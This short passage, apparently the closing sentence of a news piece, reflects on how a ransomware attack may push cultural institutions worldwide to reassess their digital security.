The broader implications of this ransomware attack may push cultural institutions worldwide to reassess their digital security strategies, ensuring that their valuable assets remain protected from a growing threat.